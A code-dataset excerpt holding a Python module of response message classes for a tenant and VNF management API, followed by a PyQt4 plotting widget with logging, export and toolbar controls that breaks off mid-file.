xanter@granit.io\n\nThis file contains request messages factory and request message classes\n\"\"\"\n\nimport json\n\nfrom .Interface_Classes import IFactoryParser\nfrom .elements_guisoc import (BaseDictGUISOC, ImageFactoryGUISOC,\n FilterResourcesResponseGUISOC,\n FilterTenantsResponseGUISOC,\n TenantStatusFactoryGUISOC,\n VNFTenantFactoryGUISOC,\n VirtNodeFactoryGUISOC, StrFactoryGUISOC,\n TenantGUISOC)\nfrom libsoc_utils import StructHelper\n\nclass FactoryParserResponseGUISOC(IFactoryParser):\n msg_classes = {}\n\n\nclass ResponseGUISOC(BaseDictGUISOC, FactoryParserResponseGUISOC):\n type_name = \"response\"\n attributes = {\n \"status\": bool,\n \"error\": int,\n \"data_center\": str,\n \"id\": int\n }\n check_names = [\"id\", \"data_center\", \"status\"]\n\n def check(self):\n pass\n # TODO: make this check\n\n\nclass StatusResponseGUISOC(ResponseGUISOC):\n type_name = \"status\"\n attributes = {\n \"virtual\": FilterTenantsResponseGUISOC,\n \"physical\": FilterResourcesResponseGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n def check(self):\n StructHelper.deep_check(StatusResponseGUISOC, self)\n # self.virtual.check()\n # self.physical.check()\n # StructHelper.check_str(self.filter, \"user_name\", False)\n # if not (self.filter in [\"all\", \"tenant\", \"node\"]):\n # pass\n\n\nclass ConsoleResponseGUISOC(ResponseGUISOC):\n type_name = \"console\"\n attributes = {\n \"content\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass RebootResponseGUISOC(ResponseGUISOC):\n type_name = \"reboot\"\n attributes = {\n \"content\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass DeployResponseGUISOC(ResponseGUISOC):\n type_name = \"deploy\"\n attributes = {\n \"name_id\": str ,# of tenant\n \"tenant\": TenantGUISOC# temporary\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass DeleteResponseGUISOC(ResponseGUISOC):\n type_name = \"delete\"\n attributes = {\n \"name_id\": str,# of tenant\n \"name\": str# temporary\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass ImageListResponseGUISOC(ResponseGUISOC):\n type_name = \"image_list\"\n attributes = {\n \"image_list\": ImageFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass AddImagesResponseGUISOC(ImageListResponseGUISOC):\n type_name = \"add_images\"\n\n\nclass DelImagesResponseGUISOC(ImageListResponseGUISOC):\n type_name = \"del_images\"\n\n\nclass PartialDeployResponseGUISOC(ResponseGUISOC):\n type_name = \"partial_deploy\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": VirtNodeFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass PartialDeleteResponseGUISOC(ResponseGUISOC):\n type_name = \"partial_delete\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": StrFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VmDeployResponseGUISOC(ResponseGUISOC):\n type_name = \"vm_deploying\"\n attributes = {\n \"name_id\": str,# of tenant\n \"nodes\": StrFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass MigrateResponseGUISOC(ResponseGUISOC):\n type_name = \"migrate\"\n MIGRATE_STATE = [\"start\", \"process\", \"finish\", \"error\"]\n attributes = {\n \"direction\": str,\n \"name_id\": str,# of node\n \"nodes\": StrFactoryGUISOC,\n \"state\": str\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFListResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_list\"\n attributes = {\n \"vnf_response\": dict\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFSubscribeResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_subscribe\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFUnsubscribeResponsetGUISOC(ResponseGUISOC):\n type_name = \"vnf_unsubscribe\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass VNFResultResponseGUISOC(ResponseGUISOC):\n type_name = \"vnf_result\"\n attributes = {\n \"tenants\": VNFTenantFactoryGUISOC,\n \"vnf_response\": dict,\n \"tenant\": str,\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nclass TenantsStatusResponseGUISOC(ResponseGUISOC):\n type_name = \"tenants_status\"\n attributes = {\n \"tenants\": TenantStatusFactoryGUISOC\n }\n attributes.update(ResponseGUISOC.attributes)\n\n\nFactoryParserResponseGUISOC.msg_classes.update({\n \"console\": ConsoleResponseGUISOC,\n \"status\": StatusResponseGUISOC,\n \"deploy\": DeployResponseGUISOC,\n \"delete\": DeleteResponseGUISOC,\n \"image_list\": ImageListResponseGUISOC,\n \"partial_deploy\": PartialDeployResponseGUISOC,\n \"partial_delete\": PartialDeleteResponseGUISOC,\n \"migrate\": MigrateResponseGUISOC,\n \"vnf_list\": VNFListResponseGUISOC,\n \"vnf_subscribe\": VNFSubscribeResponseGUISOC,\n \"vnf_unsubscribe\": VNFUnsubscribeResponsetGUISOC,\n \"vnf_result\": VNFResultResponseGUISOC,\n \"vm_deploying\": VmDeployResponseGUISOC,\n \"add_images\": AddImagesResponseGUISOC,\n \"del_images\": DelImagesResponseGUISOC,\n \"tenants_status\": TenantsStatusResponseGUISOC\n})\n","sub_path":"libsocapi/response_GUISOC.py","file_name":"response_GUISOC.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199716409","text":"\n# coding=utf-8\n\n__author__ = 'Kevin_Liao'\n__all__ = ['PlotWidget']\n\nfrom PyQt4 import QtCore, QtGui, uic\nfrom PyQt4.QtGui import QButtonGroup\nfrom PyQt4.QtCore import Qt, pyqtSlot, pyqtSignal\nfrom driver.config import Number\nfrom ui.widgets.plotter.graphics import Graphics\n# from ui.widgets.filesetting import FileConfig\nfrom ui.objects.treeview import TreeView\nfrom ui.objects.button import Button\nfrom ui.widgets.ai import AttitudeIndicator\nfrom ui.objects.painter import Painter\nfrom driver.logger import Logger\nfrom lib import Library\n\nlogger = Logger(__name__)\nlib = Library()\n\nnumber = Number()\n\nclass PlotWidget(QtGui.QWidget):\n\n def __init__(self, parent, complex = False):\n super(PlotWidget, self).__init__()\n self.layout = lib.object.setMainLayout(self, [], spaces = [2, 2], margins = [3, 3, 3, 3])\n self.horizontalLayoutTop = QtGui.QHBoxLayout()\n self.horizontalLayoutCenter = QtGui.QHBoxLayout()\n self.gridLayoutBottom = QtGui.QHBoxLayout()\n \n # tttt = lib.object.setHBoxLayout([{0: \"00000\", 1: \"11116666666666666666666666666661\", 4: \"44444\"}, {0: \"000\", 2: \"22222\", 3: \"33333\"}])\n # bbbb = lib.object.setVBoxLayout([[\"aaaaa\", \"bbb\", \"cccc\"], [\"sffsf\", \"fsfsf\", \"bbb\"]], verify = True) \n # bbbb = lib.object.setVBoxLayout([\"aaaaa\", \"bbb\", \"cccc\"], verify = True)\n # bbb = lib.object.setHBoxLayout([[\"bbbb\", \"cccc\", \"dddd\"]], verify = True) \n lib.object.setLayout([self.horizontalLayoutTop, self.horizontalLayoutCenter, self.gridLayoutBottom], self.layout)\n self.parent = parent\n self.complex = complex\n self.reportcb = lib.caller() # Called when the status change\n self.report_file = 1\n self.report_close = 2\n self.report_delfile = 3\n self.report_loadfile = 4\n self.report_winsize = 5\n \n return\n \n self.initial()\n\n \n self.fileWrite = FileConfig(self.parent)\n self.setDir(lib.config.logpath(self.parent.moduleTitle))\n self.filePath = None\n \n \"\"\"\n aaa = u\"aaaaa\"\n aaa = QtCore.QString(aaa)\n logger.info(aaa)\n logger.info(type(aaa))\n aaa = str(aaa.toUtf8())\n aaa = aaa.decode('utf-8')\n logger.info(aaa)\n logger.info(type(aaa))\n \"\"\"\n # aaa = [\"bbb\"]\n # logger.info(aaa)\n # logger.info(aaa * 2)\n \"\"\"\n aaa = [\"bbb\"]\n aaa = {}\n aaa[\"1\"] = \"abc\"\n aaa[\"2\"] = \"cde\"\n aaa[\"8\"] = \"fdfdfdf\"\n\n \"\"\"\n # logger.info(aaa)\n # logger.info(aaa ** 3)\n \n self.overwrite = False\n self.setObject()\n\n # self.widgetControl.setHidden(complex)\n\n\n # logger.info(self.graphics.createCurveTable)\n # self.graphics.createCurveThread(\"curve1\")\n # self.graphics.startCurveThread()\n if self.complex:\n self.graphics.setTitleSize(2)\n \n self.showStatus(\"IDLE\")\n\n def initial(self):\n self.logpath = None # 載入檔案路徑\n self.loadfile = None # 載入檔案\n self.exportfile = lib.filepacket() # 建立 export 檔案\n self.bulkdata = {} # bulk data\n \n def setIdle(self, idle):\n self.graphics.setIdle(idle)\n if idle:\n logger.info(\"out: %s\" % str(self))\n else:\n logger.info(\"in: %s\" % str(self))\n \n def addGraphics(self, curveName, lineName, initial = 0):\n lib.object.delLayout(self.plotObject.itemLayout) # 刪除舊 item\n if self.graphics.addGraphics(curveName, lineName, initial):\n self.plotObject.setItemLayout() # 新增 item\n self.random.initsample(1, 100, 0.001, len(lineName))\n\n def addPoint(self, data, times = None): # 增加資料\n dataStatus = self.graphics.addPoint(data, times)\n if dataStatus != None:\n timelist = lib.config.transTime(self.graphics.getLogTime())\n self.plotObject.timeLabel.setText(\"%02d:%02d:%02d\" % (timelist[\"hour\"], timelist[\"min\"], timelist[\"sec\"]))\n self.plotObject.sampleLabel.setText(str(self.graphics.getLogLength()))\n self.plotObject.intervalLabel.setText(str(self.graphics.getLogInterval()))\n \n \n self.plotObject.video.updateImage()\n # if self.graphics.getLogLength() % 2 == 1: self.plotObject.updateButton(self.plotObject.btnImageDataIn, \"blink/flickr1.png\")\n # else: self.plotObject.updateButton(self.plotObject.btnImageDataIn, \"blink/flickr.png\")\n # self.writeLogFile(dataStatus) # 寫入資料\n return dataStatus\n\n def addSignal(self, level, data):\n # dataStatus = self.graphics.addPoint(data)\n \n for index in data:\n data = level * 2 + data\n logger.info(\"L: %d, D: %d\" % (level, data))\n # self.signal = 0\n\n def showStatus(self, text = \"IDLE\", busy = False):\n if busy: color = [198, 0, 0]\n else: color = [0, 138, 69]\n lib.object.setColor(self.plotObject.status, text = \"%s\" % text, fontcolor = \"#FFFFFF\", bgcolor = color)\n\n def setBulkData(self, bulkdata):\n if len(bulkdata):\n self.bulkdata = bulkdata\n # self.plotObject.xManualRange.setChecked(True)\n # self.plotObject.xModeChange(self.plotObject.xManualRange)\n size = self.graphics.setBulkData(bulkdata)\n self.plotObject.sampleLabel.setText(str(size))\n self.plotObject.intervalLabel.setText(str(self.graphics.getLogInterval()))\n timelist = lib.config.transTime(self.graphics.getLogTime())\n self.plotObject.timeLabel.setText(\"%02d:%02d:%02d\" % (timelist[\"hour\"], timelist[\"min\"], timelist[\"sec\"]))\n # 建立亂數 baseline\n baselinelist = []\n lastdata = self.graphics.getLastPoint()\n for itemlist in self.graphics.getItem(): # 讀取 item list\n baselinelist.append(lastdata[itemlist][0])\n self.random.updatesample(baselinelist)\n self.showStatus()\n\n def setLogPath(self, path):\n self.logpath = str(path)\n\n def setLoadFile(self, file):\n self.loadfile = file\n self.loadfile.setCallback(self.setBulkData)\n \n\n \n def readConfig(self):\n pass\n\n def setObject(self):\n \n self.random = lib.random()\n self.timerThread = lib.timer(self, 0.1, self.timeServer)\n self.writefileThread = lib.queue(self, 0.5, self.writelog, 5)\n self.graphics = Graphics()\n self.plotObject = PlotObject(self)\n\n def addTag(self):\n self.graphics.addTag(\"test\")\n # self.sendButton = QtGui.QPushButton(self)\n # self.sendButton.setText(\"11\")\n \n def setTimeServer(self):\n if self.plotObject.randomSample.checkState() == Qt.Checked: self.timerThread.start()\n else: self.timerThread.stop()\n\n def timeServer(self):\n # logger.info(lib.config.timer())\n lineName = {}\n itemlist = self.graphics.getItem() # 讀取 item list\n # self.lineName[item] = self.random.getsample()\n sample = self.random.getsample(-50, 50, 0.001)\n # logger.info(sample)\n \n # self.random.cpu()\n # sample = [self.random.memory(), self.random.net(1), self.random.net(2), self.random.net(3)]\n # sample = self.random.data[\"cpu\"]\n for index in range(len(itemlist)):\n item = itemlist[index]\n # logger.info(item)\n lineName[item] = sample[index]\n self.addPoint(lineName)\n return\n rate = 0.1\n self.index = self.index + 1\n # return\n itemlist = self.graphics.getItem() # 讀取 item list\n \"\"\"\n for item in itemlist:\n # value = rand.random.random() + lib.config.np.sin(self.index * 0.1) / (self.index * 0.1) # / (self.randSampleRate) #rand.random.random()\n value = number.np.sin(self.index * 0.1)\n if item in self.lineName:\n self.lineName[item] = self.lineName[item] * (1 - rate) + value * rate\n else:\n self.lineName[item] = value\n \"\"\"\n data = number.random.random()\n for index in range(len(itemlist)):\n item = itemlist[index]\n # value = 0\n if index == 0:\n value = number.np.sin(self.index * 0.1)\n elif index == 1:\n value = number.np.cos(self.index * 0.1)\n elif index == 2:\n # value = number.np.tan(self.index * 0.1) / 100\n pass\n elif index == 3:\n value = number.np.sin(number.np.exp(self.index * 0.01)) # / number.np.log(self.index * 0.1)\n elif index == 4:\n value = number.np.sin(self.index * 0.01) / number.np.tanh(self.index * 0.1)\n elif index == 5:\n value = number.np.tanh(self.index * 0.1) / 100\n else:\n value = number.random.random()\n value = number.random.random() + index\n value = data + index * 0.1\n # value = min(2, value)\n # value = max(-2, value)\n \n \"\"\" \n if item in self.lineName:\n self.lineName[item] = self.lineName[item] * (1 - rate) + value * rate\n else:\n self.lineName[item] = value\n \"\"\"\n self.lineName[item] = lib.random().samples()\n \n \n # logger.info(lib.random())\n self.parent.addPoint(self.lineName)\n \n \n\n \n # self.graphics.getBulkData()\n\n\n\n def addCurve(self, title):\n self.graphics.addCurve(title)\n\n def clearData(self, force = False):\n if force: reply = lib.message.BtnYes # 清除資料\n else: reply = lib.object.question(self, \"開新圖形\", u\"你想要開新的圖形資料嗎\", lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: self.graphics.clearData()\n\n def deleteFile(self, force = False):\n reply = lib.object.question(self, \"刪除檔案\", u\"你想要刪除圖形資料 [%s] 嗎\" % self.graphics.getCurveName(), lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: self.reportcb.call(self, self.report_delfile, \"\")\n\n def setDir(self, dir):\n dir = str(dir)\n if dir != \"\": self.dirpath = dir\n\n def reloadfile(self): # 重新載入曲線檔\n if lib.config.isfile(self.logpath):\n reply = lib.object.question(self, \"重新載入圖檔\", u\"你想要重新載入 [%s] 圖形資料嗎\" % self.graphics.getCurveName(), lib.message.BtnYes, lib.message.BtnNo)\n self.reportcb.call(self, self.report_loadfile, self.logpath)\n\n def openFileDir(self):\n if self.logpath != None: lib.object.openUrl(self.logpath)\n\n\n def exportRangeFile1(self):\n # logger.info(\"exportRangeFile\")\n bulkdata = self.graphics.getBulkData()\n bulkdata[\"parame\"] = {\"1\": 567, \"2\": 456, \"3\": 789, \"4\": 555}\n self.exportfile.write(bulkdata)\n \n def getFilename(self, filename = \"\"):\n if filename == \"\":\n curvename = self.graphics.getCurveName()\n filename = curvename.split(\".\")[0]\n dirpath = lib.config.getdir(self.logpath)\n if lib.config.isdir(dirpath): filepath = dirpath + filename + \".txt\" # 舊目錄 \n else: filepath = self.dirpath + filename + \"/\" + filename + \".txt\" # 新目錄\n return filepath\n \n def exportFile(self):\n # fileName = \"aaaa\"\n # logger.info(self.getFilename(\"tsttstt\"))\n # filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n # logger.info(filePath)\n if self.graphics.getLogLength():\n rangeIndex = self.graphics.getRegionIndex()\n if self.plotObject.timeModeBox.currentIndex():\n data = self.graphics.getItemSample()\n datarange = [int(data[rangeIndex[0]]), int(data[rangeIndex[1]])]\n else:\n data = self.graphics.getItemTime()\n datarange = [lib.format.float(data[rangeIndex[0]]), lib.format.float(data[rangeIndex[1]])]\n reply = lib.object.question(self, \"區域圖形資料輸出\", \"你想要輸出 [%s-%s] 區域資料嗎\" % (str(datarange[0]), str(datarange[1])), lib.message.BtnYes, lib.message.BtnNo)\n # reply = lib.message.BtnYes\n if reply == lib.message.BtnYes:\n bulkdata = self.graphics.getBulkData()\n filepath = self.getFilename()\n # logger.info(\"time: %f, %f\" % (times[rangeIndex[0]], times[rangeIndex[1]]))\n # filepath = self.dirpath + fileName + \"/\" + fileName + \".txt\" \n bulkdata[\"parame\"] = {\"1\": 123, \"2\": 456, \"3\": 789}\n self.exportfile.open(filepath, \"w\", rename = True, timeformat = False, callback = self.closeexportFile)\n self.exportfile.write(bulkdata, start = rangeIndex[0], stop = rangeIndex[1])\n # if lib.config.isfile(self.filePath): self.reportcb.call(self, self.report_file, self.filePath)\n\n def closeexportFile(self, filepath):\n logger.info(\"end export\")\n logger.info(filepath)\n self.reportcb.call(self, self.report_file, filepath)\n\n def createLogFile1(self):\n bulkdata = self.graphics.getBulkData()\n fileName = str(self.graphics.getCurveName())\n logger.info(fileName)\n return\n\n \n fileStatus = self.fileWrite.isOpen()\n if not fileStatus: # 尚未建立\n fileName = str(self.graphics.getCurveName())\n if lib.config.find(fileName, \".csv\") != -1:\n fileName = fileName.replace(\".csv\", \"\")\n addr = lib.config.rfind(fileName, \"-\")\n if addr != -1: fileName = lib.config.midLength(fileName, 0, addr)\n if fileName != \"\":\n filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n \n self.file = lib.filepacket(filePath, \"w\") # 建立 Log data\n \n itemlist = self.graphics.getItem()\n header = [\"times\"] + itemlist\n # self.file.write(header)\n bulkdata = self.graphics.getBulkData()\n logger.info(bulkdata)\n return\n \n \n fileStatus = self.fileWrite.createNewFile(filePath, rename = True, timeformat = True) # 檔名使用流水編號\n self.filePath = self.fileWrite.readFileName()\n itemlist = self.graphics.getItem()\n if len(itemlist):\n header = [\"times\"]\n header = header + itemlist\n \n logger.info(header)\n \n self.fileWrite.writeFile(header, \",\")\n # 加入已存在的 data\n logger.info(lib.config.timer())\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n \n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n timelist = bulkdata[item][1]\n timenum = len(timelist)\n \n logger.info(lib.config.timer())\n for index in range(timenum):\n dataline = []\n dataline.append(timelist[index])\n for item in itemlist:\n value = datalist[item][index]\n # logger.info(type(value))\n # logger.info(value)\n # if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n logger.info(lib.config.timer())\n \n \n \n # self.writefileThread\n return fileStatus\n\n \"\"\"\n def createLogFile(self):\n fileStatus = self.fileWrite.isOpen()\n if not fileStatus: # 尚未建立\n fileName = str(self.graphics.getCurveName())\n if lib.config.find(fileName, \".csv\") != -1:\n fileName = fileName.replace(\".csv\", \"\")\n addr = lib.config.rfind(fileName, \"-\")\n if addr != -1: fileName = lib.config.midLength(fileName, 0, addr)\n if fileName != \"\":\n filePath = self.dirpath + fileName + \"/\" + fileName + \".csv\"\n fileStatus = self.fileWrite.createNewFile(filePath, rename = True, timeformat = True) # 檔名使用流水編號\n self.filePath = self.fileWrite.readFileName()\n itemlist = self.graphics.getItem()\n if len(itemlist):\n header = [\"times\"]\n header = header + itemlist\n self.fileWrite.writeFile(header, \",\")\n # 加入已存在的 data\n logger.info(lib.config.timer())\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n \n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n timelist = bulkdata[item][1]\n timenum = len(timelist)\n \n logger.info(lib.config.timer())\n for index in range(timenum):\n dataline = []\n dataline.append(timelist[index])\n for item in itemlist:\n value = datalist[item][index]\n # logger.info(type(value))\n # logger.info(value)\n # if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n logger.info(lib.config.timer())\n \n \n \n # self.writefileThread\n return fileStatus\n \"\"\"\n \n \n \n def writeLogFile(self, datalist): # 寫入 Log 資訊\n if self.plotObject.saveRawdata.checkState() == Qt.Checked:\n data = datalist[0]\n times = str(datalist[1])\n if self.createLogFile1():\n dataline = [times]\n itemlist = self.graphics.getItem()\n for item in itemlist:\n value = data[item]\n if type(value) == float: value = lib.format.float(value, 4)\n dataline.append(str(value))\n self.fileWrite.writeFile(dataline, \",\")\n\n def closeFile(self):\n self.fileWrite.closeFile()\n if lib.config.isfile(self.filePath): self.reportcb.call(self, self.report_file, self.filePath)\n self.filePath = None\n \n def writelog(self, index):\n logger.info(\"%d: \" % index)\n bulkdata = self.graphics.getBulkData()\n dataline = []\n datalist = {}\n itemlist = self.graphics.getItem()\n for item in itemlist: # 依照原始 item 順序讀取資料\n datalist[item] = bulkdata[item][0]\n timelist = bulkdata[item][1]\n\n def saveConfig(self):\n self.closeFile()\n \n def closeGraphics(self):\n reply = lib.object.question(self, \"關閉圖形\", \"你想要關閉 [%s] 圖形嗎\" % str(self.graphics.getCurveName()), lib.message.BtnYes, lib.message.BtnNo)\n if reply == lib.message.BtnYes: self.reportcb.call(self, self.report_close, \"\")\n \n def closeEvent(self, event):\n if self.loadfile != None: self.loadfile.close()\n self.timerThread.stop()\n self.graphics.close()\n self.saveConfig()\n\n\n \n \n \n\nclass PlotObject:\n \n def __init__(self, parent):\n self.parent = parent\n self.graphics = self.parent.graphics\n \n\n self.setObject()\n\n self.setCenterLayout()\n self.setBottomLayout()\n self.setTopLayout()\n\n def setObject(self):\n self.reportLock = False\n self.menuWidth = 140 # 150\n self.bgcolor = [225, 255, 255] # 標題背景\n \n \n self.graphics.reportcb.addCallback(self.updateStatus) # 嘗試加入 module sendlinkcb\n\n\n \n \n \n \n \n\n \n self.randomSample = QtGui.QCheckBox(\"Random\")\n self.randomSample.stateChanged.connect(self.parent.setTimeServer)\n\n \n self.parent.horizontalLayoutTop.setSpacing(2)\n\n \n\n \n\n\n \n self.layoutPlotControl = QtGui.QGridLayout()\n self.parent.gridLayoutBottom.addLayout(self.layoutPlotControl)\n \n # self.setPlotControlList()\n \n def updateStatus(self, index, data): # 回報狀態\n self.reportLock = True\n if index == self.graphics.reportRangeSize:\n self.xSizeRange.setValue(data)\n elif index == self.graphics.report_range_slider:\n [range_min, range_value, range_max] = data\n [min, max] = [self.xRangeSlider.minimum(), self.xRangeSlider.maximum()]\n sliderIndex = lib.config.intermediate(range_min, range_value, range_max, min, max) # 計算位移的起始點,並換算捲軸移動位置\n self.xRangeSlider.setValue(sliderIndex)\n elif index == self.graphics.report_range_manual:\n self.xManualRange.setChecked(data)\n \n \n\n if data == False: self.symbol.setCurrentIndex(0)\n \n elif index == self.graphics.report_range_info:\n [xRange, yRange] = data\n self.xMinRange.setValue(xRange[0])\n self.xMaxRange.setValue(xRange[1])\n self.yMinRange.setValue(yRange[0])\n self.yMaxRange.setValue(yRange[1])\n if self.yViewRange.currentIndex() == 2: # Fixed range\n y = [self.yMinRange.value(), self.yMaxRange.value()]\n self.graphics.setDrawAllGraphics(y = y)\n self.reportLock = False\n\n # ========================================================================\n # 物件設定區\n # ========================================================================\n\n def setTopLayout(self):\n # self.progress = lib.button(\"loading\", key = \"load*.png\")\n \n # self.status = self.setTitleLabel(\"IDLE\", 40, 16)\n self.status = lib.object.setSize(QtGui.QLabel(), 50, 16)\n lib.object.setAlignment(self.status, Qt.AlignHCenter | Qt.AlignVCenter)\n \"\"\"\n # lib.object.setColor(self.status, text = \"IDLE\", fontcolor = \"#FFFFFF\", bgcolor = [81, 190, 40])\n def funPlay(mode):\n if mode == \"play\":\n self.play.hide()\n self.pause.show()\n self.graphics.setDataEnable(True)\n else:\n self.play.show()\n self.pause.hide()\n self.graphics.setDataEnable(False)\n \n self.play = lib.object.setTooltip(lib.button(path = \"plot/play1.png\", callback = funPlay, parame = \"play\"), \"啟動資料紀錄\")\n self.pause = lib.object.setTooltip(lib.button(path = \"plot/pause1.png\", callback = funPlay, parame = \"pause\"), \"停止資料紀錄\")\n self.stop = lib.button(path = \"plot/stop1.png\")\n self.pause.hide()\n \"\"\"\n def funPlay(index):\n if index == 0: self.graphics.setDataEnable(True)\n else: self.graphics.setDataEnable(False)\n \n self.play = lib.button(path = [\"plot/play.png\", \"plot/pause.png\"], callback = funPlay)\n \n self.delaytime = 0\n def funRecord(index):\n self.delaytime = self.delaytime + 1\n self.parent.timerThread.setDelay(self.delaytime)\n self.record = lib.button(path = [\"plot/record.png\", \"plot/stop.png\"], callback = funRecord)\n funPlay(1)\n \n\n \n \n \n self.drawGraphics = False # 更新圖示\n # self.graphics.setDataEnable(self.drawGraphics)\n \n # if self.drawGraphics: funPlay(\"play\")\n # else: funPlay(\"pause\")\n \n # if self.drawGraphics: self.updateDraw.setCheckState(Qt.Checked)\n # else: self.updateDraw.setCheckState(Qt.Unchecked)\n # self.updateDraw.stateChanged.connect(self.graphics.setDataEnable)\n # self.updateDraw.setToolTip(\"Update graphics\")\n \n \n \n \n \n leftControlList = [self.status, self.play, self.record]\n leftControlLayout = lib.object.setHBoxLayout(leftControlList, spaces = [5])\n \n \n \n \n\n\n \n\n # Image Button\n \n # self.btnImageDataIn = lib.button(path = \"blink/flickr.png\")\n # logger.info(self.btnImageDataIn)\n self.video = lib.button(path = \"video\", key = \"video*.png\")\n \n self.reloadfile = lib.button(path = \"plot/download.png\", callback = self.parent.reloadfile)\n self.cleardata = lib.button(path = \"plot/newfile.png\", callback = self.parent.clearData)\n self.deletefile = lib.button(path = \"plot/delete.png\", callback = self.parent.deleteFile)\n self.exitplot = lib.button(path = \"plot/exit.png\", callback = self.parent.closeGraphics)\n \n\n\n \n \n self.itemmenu = lib.button(path = \"plot/item.png\", callback = self.swapRightMenu, parame = self.itemWidget)\n self.statusmenu = lib.button(path = \"plot/status.png\", callback = self.swapRightMenu, parame = self.statusWidget)\n self.rangemenu = lib.button(path = \"plot/settings.png\", callback = self.swapRightMenu, parame = self.rangeWidget)\n self.settingmenu = lib.button(path = \"plot/cog1.png\", callback = self.swapRightMenu, parame = self.settingWidget)\n self.savemenu = lib.button(path = \"plot/save.png\", callback = self.swapRightMenu, parame = self.saveWidget)\n self.tagsmenu = lib.button(path = \"plot/tags.png\", callback = self.swapRightMenu, parame = self.tagWidget)\n\n \n # 版面風格\n def funInterfaceStyle():\n logger.info(self.plotstyle)\n self.graphics.setPlotStyle(self.plotstyle)\n lib.plotcfg.set(\"plotstyle\", self.plotstyle)\n if self.plotstyle == 0: self.plotstyle = 1\n else: self.plotstyle = 0\n \n self.plotinterface = lib.button(path = \"plot/bright2.png\", callback = funInterfaceStyle)\n self.plotstyle = lib.plotcfg.get(\"plotstyle\", 0)\n funInterfaceStyle()\n\n\n\n\n self.folder = lib.button(path = \"plot/folder.png\", callback = self.parent.openFileDir)\n\n \n # 左邊選項目錄顯示\n def funPlotWin(index):\n self.parent.reportcb.call(self.parent, self.parent.report_winsize, \"\")\n self.contract = lib.button(path = [\"plot/expand.png\", \"plot/contract.png\"], callback = funPlotWin)\n\n # 建立 Rect 或是 Pan 模式\n def funRect(index):\n if index == 0: self.graphics.setMouseMode(True)\n else: self.graphics.setMouseMode(False)\n self.rectplot = lib.button(path = [\"plot/pan.png\", \"plot/rect.png\"], callback = funRect)\n\n \n controlItemList = [lib.object.spacer(-1, 0), self.statusmenu, self.itemmenu, self.rangemenu, self.settingmenu, self.savemenu, self.tagsmenu]\n controlItemList += [self.folder, self.plotinterface, self.contract, self.rectplot, self.cleardata, self.reloadfile, self.deletefile, self.exitplot, self.randomSample]\n\n \n \n \n self.floatWin = False\n def funFloatWindows():\n # if self.floatWin:\n \n \n self.floatWin = not self.floatWin\n print(self.floatWin)\n print(self.parent)\n self.parent.hide()\n self.parent.show()\n # self.btnImageFloat.setRelease(funFloatWindows)\n \n \n \n\n \n # btnImageList += [ self.reloadfile, self.btnImageFloat, self.btnImageClear]\n # btnImageLayout = lib.object.setHBoxLayout(btnImageList, spaces = [5])\n\n # lib.object.vseparator()\n\n # plotcontrol = [leftControlLayout, lib.object.spacer(-1, 0), self.rectModeCheck, self.btnImageDataIn, self.randomSample, self.saveRawdata, btnImageLayout]\n \n controlMenuList = [self.video, self.statusmenu, self.itemmenu, self.rangemenu, self.settingmenu, self.savemenu]\n\n \n # controlItemLayout = lib.object.setHBoxLayout(controlItemList, spaces = [5])\n lib.object.setLayout(leftControlList + controlMenuList + controlItemList, self.parent.horizontalLayoutTop, spaces = [5])\n\n \n # lib.object.setLayout([self.btnImageDataIn.getWidget(), self.btnImageClear.getWidget()], self.horizontalLayoutTop)\n # lib.object.setLayout([self.btnImageClose.getWidget()], self.horizontalLayoutTop)\n\n \n\n\n def setCenterLayout(self):\n self.rightWidget = lib.object.setHBoxLayout([], True, margins = [0, 0, 0, 0])\n self.rightLayout = self.rightWidget.layout()\n \n \n self.setPlotLayout()\n self.setItemLayout(True)\n self.setStatusLayout()\n self.setRangeLayout()\n self.setSettingLayout()\n self.setSaveLayout()\n self.setTagLayout()\n \n # lib.object.setLayout([self.controlWidget], self.parent.horizontalLayoutCenter)\n lib.object.setLayout([self.plotWidget, self.rightWidget], self.parent.horizontalLayoutCenter, spaces = [4])\n self.setRightMenu()\n \n \n \n \n \n\n # lib.object.setWidth(widget, 38)\n # lib.object.setWidth(self.rightWidget, self.menuWidth)\n # logger.info(\"objects.getLayout(self.rightLayout)\")\n # logger.info(lib.object.getLayout(self.rightLayout))\n # lib.object.setLayouMargins([self.regionLayout])\n # lib.object.setLayoutSpaces([self.rangeLayout], 